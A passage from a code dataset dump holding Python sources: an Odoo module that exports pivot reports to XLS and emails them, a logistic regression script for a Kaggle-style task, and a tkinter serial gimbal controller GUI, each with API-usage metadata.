'2216',\n 'expanded': False\n })\n group_label = group_item.get(group_field)\n if not group_label:\n group_label = 'Undefined'\n if type(group_label) == type(list()) or type(group_label) == type(tuple()):\n group_label = group_label[1]\n group_labels.append({\n 'width': len(pivot_measures),\n 'height': 1,\n 'title': group_label,\n # 'id': '2216',\n 'expanded': False\n })\n totals = []\n for measure in pivot_measures:\n if measure == '__count__':\n totals.append({\n 'width': 1,\n 'height': 1,\n 'title': 'count',\n # 'id': '2216',\n 'expanded': False\n })\n else:\n totals.append({\n 'width': 1,\n 'height': 1,\n 'title': measure,\n # 'id': '2216',\n 'expanded': False\n })\n return [[{\n 'width': len(measures),\n 'height': 1,\n 'title': 'Total',\n 'id': '2216',\n 'expanded': False\n }, {\n 'width': len(totals),\n 'height': len(pivot_column_groupby),\n 'title': '',\n 'id': '2216',\n 'expanded': False\n }], group_labels, measures + totals]\n\n @api.model\n def build_measure_row(self):\n result = []\n for measure in self.measure_ids:\n if measure.name:\n result.append({\n 'text': measure.field_description,\n 'is_bold': True\n })\n return result\n\n @api.model\n def get_measure_lenth(self):\n return len(self.measure_ids)\n\n @api.model\n def build_rows(self):\n result = []\n report_obj = self.env.get(self.reporting_id)\n\n filter_context = eval(self.filter_id.context)\n if not filter_context:\n filter_context = {}\n\n pivot_measures = filter_context.get('pivot_measures', [])\n pivot_row_groupby = filter_context.get('pivot_row_groupby', [])\n pivot_column_groupby = filter_context.get('pivot_column_groupby', [])\n\n fields = []\n for measure in pivot_measures:\n fields.append(measure.split(':')[0])\n for row in pivot_row_groupby:\n fields.append(row.split(':')[0])\n for column in pivot_column_groupby:\n fields.append(column.split(':')[0])\n\n domain = eval(self.filter_id.domain)\n if not domain:\n domain = []\n\n index = 0\n values = []\n table_data = {}\n table_index = []\n for group_field in pivot_column_groupby:\n group_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n for group_item in group_data:\n group_id = group_item.get(group_field)\n if type(group_id) == type(list()) or type(group_id) == type(tuple()):\n group_id = group_id[0]\n for measure in pivot_measures:\n table_index.append({\n 'id': group_id,\n 'measure': measure,\n 'index': index\n })\n if measure == '__count__':\n table_data[index] = {\n 'value': group_item.get('%s_count' %(group_field,)),\n }\n else:\n table_data[index] = {\n 'value': group_item.get(measure),\n }\n index = index + 1\n total_data = report_obj.read_group(domain=domain, fields=fields, groupby=[])\n for total_item in total_data:\n for measure in pivot_measures:\n table_index.append({\n 'id': 'root',\n 'measure': measure,\n 'index': index\n })\n if measure == '__count__':\n table_data[index] = {\n 'value': total_item.get('__count')\n }\n else:\n table_data[index] = {\n 'value': total_item.get(measure)\n }\n index = index + 1\n\n for table_item in table_index:\n index = table_item.get('index')\n values.append(table_data.get(index))\n\n result.append({\n # 'id': '2215',\n 'indent': 0,\n 'title': 'Total',\n 'expanded': True,\n 'values': values\n })\n\n if pivot_row_groupby:\n result += self._build_rows(table_index, domain, fields, pivot_column_groupby, pivot_measures, pivot_row_groupby)\n\n return result\n\n @api.model\n def _get_index_from_table(self, table_index, id, measure):\n index = 0\n for table_item in table_index:\n if table_item.get('id') == id and table_item.get('measure') == measure:\n index = table_item.get('index')\n return index\n\n @api.model\n def _build_rows(self, table_index, domain, fields, columns, measures, rows, field_index=0):\n result = []\n report_obj = self.env.get(self.reporting_id)\n if field_index < len(rows):\n group_field = rows[field_index]\n total_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n\n for total_item in total_data:\n new_domain = total_item.get('__domain')\n values = []\n table_data = {}\n for table_item in table_index:\n index = table_item.get('index')\n table_data[index] = {'value': 0}\n for column in columns:\n group_data = report_obj.read_group(domain=new_domain, fields=fields, groupby=[column])\n for group_item in group_data:\n group_id = group_item.get(column)\n if type(group_id) == type(list()) or type(group_id) == type(tuple()):\n group_id = group_id[0]\n for measure in measures:\n index = self._get_index_from_table(table_index, group_id, measure)\n if measure == '__count__':\n table_data[index] = {\n 'value': group_item.get('%s_count' %(column,))\n }\n else:\n table_data[index] = {\n 'value': group_item.get(measure)\n }\n for measure in measures:\n index = self._get_index_from_table(table_index, 'root', measure)\n if measure == '__count__':\n table_data[index] = {\n 'value': total_item.get('%s_count' %(group_field.split(':')[0],))\n }\n else:\n table_data[index] = {\n 'value': total_item.get(measure)\n }\n\n for table_item in table_index:\n index = table_item.get('index')\n values.append(table_data.get(index))\n\n if total_item.get(group_field):\n field_label = total_item.get(group_field)\n if type(field_label) == type(list()) or type(field_label) == type(tuple()):\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': field_label[1],\n 'expanded': True,\n 'values': values\n })\n else:\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': field_label,\n 'expanded': True,\n 'values': values\n })\n else:\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': 'Undefined',\n 'expanded': True,\n 'values': values\n })\n result += self._build_rows(table_index, new_domain, fields, columns, measures, rows, field_index + 1)\n\n return result\n\n @api.model\n def get_report_data(self):\n data = self.build_data()\n return data\n\n @api.model\n def get_email_template(self):\n return self.env.ref('auto_send_report.auto_report_template')\n\n @api.multi\n def send_email(self, excel_path):\n self.sudo()._send_email(excel_path)\n\n @api.multi\n def _send_email(self, excel_path):\n for report in self:\n result = False\n # email_obj = self.pool.get('mail.template')\n template = self.get_email_template()\n\n email_to = []\n for recipient in report.recipient_ids:\n if recipient.email:\n email_to.append(recipient.email)\n email_to = ','.join(email_to)\n\n excel_data = ''\n with open(excel_path, 'r') as file: # Use file to refer to the file object\n data = file.read()\n excel_data += data\n\n filename = 'report.xls'\n attachment = self.env.get('ir.attachment').create({\n 'name': filename,\n 'res_name': filename,\n 'type': 'binary',\n 'datas_fname': filename,\n 'datas': excel_data.encode('base64'),\n 'mimetype': 'application/vnd.ms-excel',\n })\n\n if email_to:\n template.write({\n 'email_to': email_to,\n 'attachment_ids': [(6, 0, [attachment.id])]\n })\n result = template.send_mail(report.id, True)\n return result\n\n @api.model\n def export_xls(self, jdata):\n nbr_measures = jdata['nbr_measures']\n workbook = xlwt.Workbook()\n worksheet = workbook.add_sheet(jdata['title'][:30])\n header_bold = xlwt.easyxf(\"font: bold on; pattern: pattern solid, fore_colour gray25;\")\n header_plain = xlwt.easyxf(\"pattern: pattern solid, fore_colour gray25;\")\n bold = xlwt.easyxf(\"font: bold on;\")\n\n # Step 1: writing headers\n headers = jdata['headers']\n\n # x,y: current coordinates\n # carry: queue containing cell information when a cell has a >= 2 height\n # and the drawing code needs to add empty cells below\n x, y, carry = 1, 0, deque()\n for i, header_row in enumerate(headers):\n worksheet.write(i,0, '', header_plain)\n for header in header_row:\n while (carry and carry[0]['x'] == x):\n cell = carry.popleft()\n for i in range(nbr_measures):\n worksheet.write(y, x+i, '', header_plain)\n if cell['height'] > 1:\n carry.append({'x': x, 'height':cell['height'] - 1})\n x = x + nbr_measures\n style = header_plain if 'expanded' in header else header_bold\n for i in range(header['width']):\n worksheet.write(y, x + i, header['title'] if i == 0 else '', style)\n if header['height'] > 1:\n carry.append({'x': x, 'height':header['height'] - 1})\n x = x + header['width'];\n while (carry and carry[0]['x'] == x):\n cell = carry.popleft()\n for i in range(nbr_measures):\n worksheet.write(y, x+i, '', header_plain)\n if cell['height'] > 1:\n carry.append({'x': x, 'height':cell['height'] - 1})\n x = x + nbr_measures\n x, y = 1, y + 1\n\n # Step 2: measure row\n if nbr_measures > 1:\n worksheet.write(y,0, '', header_plain)\n for measure in jdata['measure_row']:\n style = header_bold if measure['is_bold'] else header_plain\n worksheet.write(y, x, measure['text'], style);\n x = x + 1\n y = y + 1\n\n # Step 3: writing data\n x = 0\n for row in jdata['rows']:\n worksheet.write(y, x, row['indent'] * ' ' + ustr(row['title']), header_plain)\n for cell in row['values']:\n x = x + 1\n if cell.get('is_bold', False):\n worksheet.write(y, x, cell['value'], bold)\n else:\n worksheet.write(y, x, cell['value'])\n x, y = 0, y + 1\n\n filepath = self.get_tmp_path('report.xls')\n workbook.save(filepath)\n\n return filepath\n\n @api.model\n def get_tmp_path(self, filename):\n return os.path.join(config['data_dir'], 'filestore', self.env.cr.dbname, filename)\n\n def get_data_dir(self):\n return config['data_dir']\n\n @api.onchange('reporting_id')\n def _onchange_reporting_id(self):\n result = {}\n if self.reporting_id:\n self.filter_id = False\n self.measure_ids = []\n result = {\n 'domain': {\n 'filter_id': [('model_id','=',self.reporting_id)],\n 'measure_ids': [('name','!=','id'),('model_id.model','=',self.reporting_id),'|',('ttype','=','float'),('ttype','=','integer')],\n }\n }\n return result", "sub_path": "beta-dev1/auto_send_report/models/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 18960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "odoo.models.Model", "line_number": 15, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 18, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 32, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 32, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 33, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 33, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 34, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 34, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 35, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 35, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 36, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 36, "usage_type": "name"}, {"api_name": "odoo.fields.Date", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 41, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 53, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 53, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 53, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 43, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 67, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 67, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 67, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 73, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 64, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 80, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 80, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 88, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 88, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 110, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 112, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 112, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 114, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 114, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 116, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 116, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 125, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 98, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 98, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 188, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 188, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 199, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 199, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 216, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 218, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 218, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 220, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 220, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 222, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 222, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 233, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 253, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 284, "usage_type": "argument"}, {"api_name": "odoo.api.model", "line_number": 203, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 203, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 288, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 288, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 302, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 312, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 368, "usage_type": "argument"}, {"api_name": "odoo.api.model", "line_number": 296, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 296, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 372, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 372, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 377, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 377, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 381, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 381, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 385, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 385, "usage_type": "name"}, {"api_name": "xlwt.Workbook", "line_number": 424, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 426, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 427, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 428, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 436, "usage_type": "call"}, {"api_name": "odoo.tools.ustr", "line_number": 474, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 421, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 421, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path", "line_number": 490, "usage_type": "attribute"}, {"api_name": "odoo.tools.config", "line_number": 490, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 488, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 488, "usage_type": "name"}, {"api_name": "odoo.tools.config", "line_number": 493, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 495, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 495, "usage_type": "name"}]} +{"seq_id": "428540748", "text": "import os\nimport pandas as pd\n\ndata_dir= 'C:/Users/user/Desktop/class/maching learning/project/group/Don-t_Overfit_PolyU/dataset'\n\n# features selected by RFECV with lasso\nfeatures = ['16', '33', '43', '45', '52', '63', '65', '73', '90', '91', '117', '133',\n '134', '149', '189', '199', '217', '237', '258', '295']\n\n#observe train data\nfilenameTrain=os.path.join(data_dir,'train.csv')\ntrain=pd.read_csv(filenameTrain)\n\n#observe test data\nfilenameTest=os.path.join(data_dir,'test.csv')\ntest=pd.read_csv(filenameTest)\n\n#load prepared data\ndef get_train_data():\n train=pd.read_csv(filenameTrain,index_col=0) #去掉第一行的預設值\n x_train=train.iloc[:,1:]#每一行,列(除了target)\n y_train=train['target']\n return x_train,y_train\n\ndef get_test_data():\n test=pd.read_csv(filenameTest,index_col=0) #去掉第一行的預設值\n #test=test[features]\n return test\n \n \nx_train0,y_train=get_train_data()\ntest=get_test_data()\n\n\n#使用Logistic Regression之前需要先對資料做特徵縮放\n#使用sklearn.preprocessing.StandardScaler類,使用該類的好處在於可以保存訓練集中的參數(均值、方差)直接使用其對象轉換測試集數據。\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nx_train=pd.DataFrame(scaler.fit_transform(x_train0),columns=x_train0.columns,index=x_train0.index)\ntest=pd.DataFrame(scaler.fit_transform(test),columns=test.columns,index=test.index)\n\n#logistic regression\nfrom sklearn.linear_model import LogisticRegression\nlog = LogisticRegression(\n penalty='l1', #l1:拉普拉斯分佈; l2:高斯分佈\n dual=False,\n tol=1e-4,\n C=0.2, #越小的數值表示越強的正則化,正則化是用來防止模型過擬合的過程 1.0/0.5/0.3/0.2/0.1\n fit_intercept=False, #指定是否應該向決策函數添加常量(即偏差或截距)\n intercept_scaling=1, #:僅在solver為”liblinear”,且fit_intercept設置為True時有用\n class_weight='balanced',#{0:0.4,1:0.6}, #比如對於0,1的二元模型,我們可以定義class_weight={0:0.9,1:0.1},這樣類型0的權重為90%,而類型1的權重為10%:None/{0:0.9,1:0.1}/balanced\n random_state=None,\n solver='liblinear', #liblinear適用於小數據集,而sag和saga適用於大數據集因為速度更快:liblinear/saga/newton-cg/lbfgs/sag\n max_iter=100,#僅在正則化優化算法為newton-cg, sag和lbfgs才有用,算法收斂的最大迭代次數。\n multi_class= 'ovr', #ovr/multinomial:多分類\n verbose=0, #印出模型\n warm_start=False, #如果為True,則下一次訓練是以追加樹的形式進行(重新使用上一次的調用作為初始化)\n n_jobs=1 #1的時候,用CPU的一個內核運行程序,2的時候,用CPU的2個內核運行程序。為-1的時候,用所有CPU的內核運行程序\n )\n\n\nlog.fit(x_train,y_train)\n\n\n#result\nprediction = log.predict(test)\nprediction = pd.DataFrame(prediction)\nprediction.index += 250\nprediction.columns = ['target']\nprediction.to_csv('C:/Users/user/Desktop/class/maching learning/project/group/Don-t_Overfit_PolyU/result/Logistic Regression(feature_select).csv', index_label='id', index=True)\n", "sub_path": "Logistic Regression.py", "file_name": "Logistic Regression.py", "file_ext": "py", "file_size_in_byte": 3250, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "384793108", "text": "import gimbal as gb\nimport serial\nimport serial.tools.list_ports as lp\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\n\nLARGE_FONT = (\"Verdana\", 12)\nFILL_HOZ = tk.W+tk.E+tk.N+tk.S\n\n\nclass gimbalApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n #--------------------tk setup--------------------\n tk.Tk.__init__(self, *args, **kwargs)\n tk.Tk.wm_title(self, \"DDC Gimbal Controller\")\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0,weight=1)\n container.grid_columnconfigure(0,weight=1)\n \n #------------------frame setup-------------------\n self.frames = {}\n self.frame = StartPage(container,self)\n frames = [StartPage]\n #for F in frames:\n # frame = F(container,self)\n # self.frames[F] = frame\n self.frame.grid(row=0,column=0, sticky=\"nswe\")\n self.frame.tkraise()\n self.frame.disable_buttons()\n\n #-----------------menubar setup------------------\n menubar = tk.Menu(container)\n \n self.connmenu = tk.Menu(menubar, tearoff=0) \n self.connmenu.add_cascade(label=\"COM Port\")\n self.connmenu.add_command(label=\"Connect\", command=lambda:self._connect_gimbal())\n \n self.connmenu.add_separator()\n self.connmenu.add_command(label=\"Scan\", command=lambda:self._refresh_ports(menubar))\n \n menubar.add_cascade(label=\"Connect\", menu=self.connmenu)\n\n tk.Tk.config(self, menu=menubar)\n self.connmenu.entryconfig(1, state=\"disabled\")\n\n self._refresh_ports(menubar)\n\n def disconnect(self):\n try:\n self.gimbal.close()\n except Exception as e:\n pass\n self.frame.disconnect()\n self.frame.update()\n self.connmenu.entryconfig(0, state=\"normal\")\n self.connmenu.entryconfig(1, state=\"disabled\")\n self.connmenu.entryconfig(3, label=\"Scan\")\n\n def _refresh_ports(self,root):\n self.disconnect()\n comports = lp.comports()\n self.ports = []\n portmenu = tk.Menu(root, tearoff=0)\n for i in range(len(comports)):\n self.ports.append(comports[i].device)\n portmenu.add_command(label=self.ports[i],\n command=lambda i=i:self._connect_command(index=i))\n\n self.connmenu.entryconfig(0, menu=portmenu)\n \n\n def _connect_command(self, index):\n print(index)\n self.connmenu.entryconfig(1, state=\"normal\")\n self.select = index\n\n def _connect_gimbal(self):\n try:\n self.frame.update_status(\"connecting\")\n self.frame.update()\n print('Trying to connect')\n self.gimbal = gb.Gimbal(self.ports[self.select])\n except Exception as e:\n print(str(e))\n tk.messagebox.showerror(\"Connection Error\", \"Could not connect to gimbal\")\n self.disconnect()\n else:\n print('hi')\n self.frame.enable_buttons()\n \n self.connmenu.entryconfig(0, state=\"disabled\")\n self.connmenu.entryconfig(1, state=\"disabled\")\n self.connmenu.entryconfig(3, label=\"Disconnect\")\n self.frame.update_status(\"connected\")\n\n def gimbal_power(self, value):\n if value == 0 or value == 1:\n self.gimbal.set_enable(value)\n\n def gimbal_direction(self, value):\n if value == 0 or value == 1:\n try:\n self.gimbal.set_direction(value)\n except serial.serialutil.SerialException:\n self.disconnect()\n tk.messagebox.showerror(\"Connection Error\", \"Gimbal disconnected\")\n def gimbal_position(self, value):\n self.gimbal.set_position(value)\n\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n self._row_count = 0\n \n tk.Frame.__init__(self,parent)\n\n status_frame = self._add_labelframe(self,\"\", 0, self._get_row(), 2)\n \n label = tk.Label(status_frame, text=\"Status:\", font=LARGE_FONT)\n label.grid(column=0, row=0, pady=10, padx=10, sticky=tk.E)\n\n self.status_label = tk.Label(status_frame, font=LARGE_FONT, text=\"Disconnected\", foreground = \"red\")\n self.status_label.grid(column=1, row=0, pady=10, padx=10, sticky=tk.W)\n\n data_frame = self._add_labelframe(self, \"Gimbal Data\", 0, self._get_row(), 2)\n\n testlabel = tk.Label(data_frame, text=\"Test\", font=LARGE_FONT)\n testlabel.grid(column=0, row=0, padx=10, sticky=FILL_HOZ)\n\n entry_text = tk.StringVar()\n testentry = tk.Entry(data_frame, state='disabled', textvariable = entry_text, font=LARGE_FONT, width=10)\n testentry.grid(column=1, row=0, padx=10, pady=5, sticky=FILL_HOZ)\n entry_text.set(\"hello\")\n\n testlabel = tk.Label(data_frame, text=\"Test\", font=LARGE_FONT)\n testlabel.grid(column=2, row=0, padx=10, sticky=FILL_HOZ)\n\n entry2_text = tk.StringVar()\n testentry2 = tk.Entry(data_frame, state='disabled', textvariable = entry2_text, font=LARGE_FONT, width=10)\n testentry2.grid(column=3, row=0, padx=10, pady=5, sticky=FILL_HOZ)\n entry2_text.set(\"hi\")\n \n movement_frame = self._add_labelframe(self, \"Gimbal Movement\", 0, self._get_row(), 1)\n\n self.buttons = []\n \n self.enable = tk.IntVar()\n self._add_radiobtn(\"Enable\", movement_frame, self.enable, 1,\n lambda:self._power_btn_resp(1, controller), 0, 0)\n self._add_radiobtn(\"Disable\", movement_frame, self.enable, 0,\n lambda:self._power_btn_resp(0, controller), 1, 0)\n\n\n direction_frame = self._add_labelframe(self, \"Gimbal Direction\", 0, self._get_row(), 1)\n \n self.direction = tk.IntVar()\n self._add_radiobtn(\"Normal\", direction_frame, self.direction, 1,\n lambda:controller.gimbal_direction(1),0,0)\n self._add_radiobtn(\"Inverted\", direction_frame, self.direction, 0,\n lambda:controller.gimbal_direction(0),1,0)\n\n self.enable.set(2)\n self.direction.set(2)\n \n position_frame = self._add_labelframe(self, \"Gimbal Position\", 1, 2, 1)\n\n self.position = tk.IntVar()\n self.slider = tk.Scale(position_frame, from_=0, to=180, orient=tk.HORIZONTAL,var=self.position,\n command=lambda i = self.position: self._position_resp(i, controller))\n self.position.set(90)\n self.slider.grid(column=0, row=0, padx=10, sticky=FILL_HOZ)\n\n def _get_row(self):\n self._row_count += 1\n return self._row_count - 1\n \n def _add_radiobtn(self, text, frame, var, val, cmd, col, row):\n btn = tk.Radiobutton(frame, font=LARGE_FONT, text=text, variable=var, value=val, command=cmd)\n btn.grid(column=col, row=row, padx=10, sticky=FILL_HOZ)\n self.buttons.append(btn)\n\n def _add_labelframe(self, root, text, col, row, col_span = 1):\n label_frame = tk.LabelFrame(root, text=text, font=LARGE_FONT)\n label_frame.grid(column=col, row=row, padx=10, pady=5, sticky=FILL_HOZ, columnspan = col_span)\n return label_frame\n\n def _position_toggle(self, val):\n if val == 0:\n self.position.set(90)\n self.slider.configure(state=\"disabled\")\n elif val == 1:\n self.slider.configure(state=\"normal\")\n\n def _position_resp(self, val, controller):\n try:\n controller.gimbal_position(int(val))\n except AttributeError:\n self._position_toggle(0)\n except serial.serialutil.SerialException:\n controller.disconnect()\n tk.messagebox.showerror(\"Connection Error\", \"Gimbal disconnected\")\n \n def _power_btn_resp(self, val, controller):\n if val == 0:\n self._position_toggle(1)\n elif val == 1:\n self._position_toggle(0)\n else:\n return\n controller.gimbal_power(val)\n \n def enable_buttons(self):\n for button in self.buttons:\n button['state'] = 'normal'\n\n def disable_buttons(self):\n for button in self.buttons:\n button['state'] = 'disabled'\n self.enable.set(3)\n self.direction.set(3)\n\n def disconnect(self):\n self.update_status(\"disconnected\")\n self.disable_buttons()\n self._position_toggle(0)\n \n def update_status(self, status):\n if status == \"disconnected\":\n self.status_label.configure(text=\"Disconnected\", foreground=\"red\")\n elif status == \"connecting\":\n self.status_label.configure(text=\"Connecting\", foreground=\"orange\")\n elif status == \"connected\":\n self.status_label.configure(text=\"Connected\", foreground=\"green\")\n\napp = gimbalApp()\n", "sub_path": "code/Python/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8897, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tkinter.W", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.E", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.N", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.S", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.wm_title", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.Tk.config", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 44, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports.comports", "line_number": 62, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 64, "usage_type": "call"}, {"api_name": "gimbal.Gimbal", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 86, "usage_type": "attribute"}, {"api_name": "serial.serialutil", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 123, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 124, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 128, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 131, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 132, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 136, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 140, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 148, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 157, 